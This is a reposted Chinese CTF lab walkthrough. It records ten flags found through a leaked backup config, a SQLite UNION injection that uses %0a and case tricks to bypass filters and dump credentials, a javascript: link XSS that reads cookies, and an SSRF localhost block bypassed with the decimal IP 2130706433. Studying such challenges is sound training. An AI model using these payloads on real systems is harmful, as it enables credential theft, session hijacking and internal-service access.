某CTF靶场通关小记

admin
admin
admin
0
文章
0
评论
2026-01-08 01:54:28 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文记录了某CTF靶场通关全过程,涵盖信息泄露、SQL注入、XSS及SSRF等漏洞利用。首先通过robots.txt与备份文件泄露获取凭证;随后利用SQLite注入配合换行符绕过获取管理员权限;通过工单XSS窃取Cookie;利用SSRF配合十进制IP转换绕过本地限制访问内部服务;最后通过POST参数爆破及文件下载获取Flag。文章详细展示了各环节的Payload构造与绕过技巧,适合渗透测试实战参考。 综合评分: 88 文章分类: CTF,WEB安全,渗透测试

cover_image

某CTF靶场通关小记

原创

摆烂的beizeng

土拨鼠的安全屋

2026年1月7日 17:08 山东

flag1

访问主页发现robot.txt文件

image-20260106082725053

image-20260106082807687

直接访问http://23.95.91.162:35000/backup/config.sample,打开即可获取flag

# Sample configuration file for local development
# NOTE: Do not commit secrets to version control!

# test credentials
username=user1
password=test123

# VIP customer order tracking
vip_order_id=1337

# A hint for developers: sometimes our secrets end up in the wrong place...

# Flag for stage 2
flag2{sX79mrbY0fpZ4qV2CAIgzR8uPFJWtMjQ}

flag2

image-20260106083429109

flag3

使用凭证user1/test123登陆

image-20260106083312204

flag4

根据提示# VIP customer order tracking,vip_order_id=1337

image-20260106083514555

flag5

订单搜索存在注入

image-20260106083616915

过滤了union select 空格,大小写、%0a 绕过空格。不支持 database()函数,从报错特征 SQL Error: no such function: DATABASE 判别出这是 SQLite 数据库。

%27%0aUnion%0aSelect%0a1,2,(Select%0agroup_concat(username,password)%0afrom%0ausers)--

找到admin账号密码admin/passadmin

image-20260106083820516

然后在email中发现flag

%27%0aUnion%0aSelect%0a1,2,(Select%0agroup_concat(email)%0afrom%0ausers)--

image-20260106084201494

flag6

管理员面板找到flag

image-20260106084317751

flag7

image-20260106084355713

创建一个新工单造成xss漏洞获取cookie

image-20260106084435751

<a href="javascript:alert(document.cookie)">test</a>

image-20260106084457868

flag8

提示:管理员备注:内部服务可通过 /proxy?url=http://127.0.0.1:5000/internal/status 中转访问。

访问返回:Access denied: localhost and 127.0.0.1 are blocked。猜测针对127.0.0.1进行了过滤。

使用进制绕过:

image-20260106084634996

直接访问:http://23.95.91.162:35000/proxy?url=http://2130706433:5000/internal/flag7

image-20260106084733796

flag9

访问http://23.95.91.162:35000/proxy?url=http://2130706433:5000/vault

image-20260106084851504

爆破提示

image-20260106085255937

直接访问vault路由

image-20260106085321880

爆破post发送7392即可,flag8{Kp4mXwN8vQrT2YsLjH6oBcEfUgA1iZ3d}

image-20260106085357071

flag10

根据提示访问http://23.95.91.162:35000/proxy?url=http://2130706433:5000/internal/download?name=flag9.txt

image-20260106085028270

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:土拨鼠的安全屋 摆烂的beizeng《某CTF靶场通关小记》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
某CTF靶场通关小记 网络安全文章

某CTF靶场通关小记

文章总结: 本文记录了某CTF靶场通关全过程,涵盖信息泄露、SQL注入、XSS及SSRF等漏洞利用。首先通过robots.txt与备份文件泄露获取凭证;随后利用
01-080 评论
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0